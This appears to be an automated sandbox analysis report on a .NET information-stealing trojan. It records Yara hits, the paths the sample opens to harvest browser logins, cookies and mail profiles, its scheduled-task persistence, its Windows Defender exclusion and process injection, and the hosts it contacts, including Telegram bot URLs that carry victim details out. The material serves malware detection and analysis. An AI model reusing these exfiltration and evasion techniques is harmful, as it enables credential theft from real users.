                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Users\user\Desktop\Ti5nuRV7y4.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Users\user\AppData\Roaming\aoTiGLRa.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Users\user\AppData\Roaming\aoTiGLRa.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.7340000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR
                      Source: Yara matchFile source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.7340000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR
                      Source: Yara matchFile source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aoTiGLRa.exe PID: 7728, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      11
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      1
                      Scheduled Task/Job
                      11
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      31
                      Virtualization/Sandbox Evasion
                      Security Account Manager31
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares1
                      Data from Local System
                      3
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      System Network Configuration Discovery
                      SSHKeylogging14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      File and Directory Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync13
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569417 Sample: Ti5nuRV7y4.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Scheduled temp file as task from temp location 2->62 68 12 other signatures 2->68 8 Ti5nuRV7y4.exe 7 2->8         started        12 aoTiGLRa.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\aoTiGLRa.exe, PE32 8->38 dropped 40 C:\Users\...\aoTiGLRa.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpD06F.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\Ti5nuRV7y4.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 Ti5nuRV7y4.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 24 aoTiGLRa.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 kashmirestore.com 119.18.54.39, 21, 49826, 49832 PUBLIC-DOMAIN-REGISTRYUS India 14->52 54 checkip.dyndns.com 132.226.8.169, 49703, 49708, 49714 UTMEMUS United States 14->54 56 2 other IPs or domains 14->56 80 Loading BitLocker PowerShell Module 18->80 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Ti5nuRV7y4.exe63%ReversingLabsByteCode-MSIL.Trojan.DarkVision
                      Ti5nuRV7y4.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\aoTiGLRa.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\aoTiGLRa.exe63%ReversingLabsByteCode-MSIL.Trojan.DarkVision
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://kashmirestore.com0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      kashmirestore.com
                      119.18.54.39
                      truetrue
                        unknown
                        reallyfreegeoip.org
                        104.21.67.152
                        truefalse
                          high
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            checkip.dyndns.com
                            132.226.8.169
                            truefalse
                              high
                              checkip.dyndns.org
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    high
                                    http://checkip.dyndns.org/false
                                      high
                                      https://reallyfreegeoip.org/xml/8.46.123.228false
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.office.com/aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003509000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/chrome_newtabTi5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.orgTi5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoTi5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/botTi5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003427000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    high
                                                    https://chrome.google.com/webstore?hl=enHaoTiGLRa.exe, 00000014.00000002.3699672767.00000000034C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
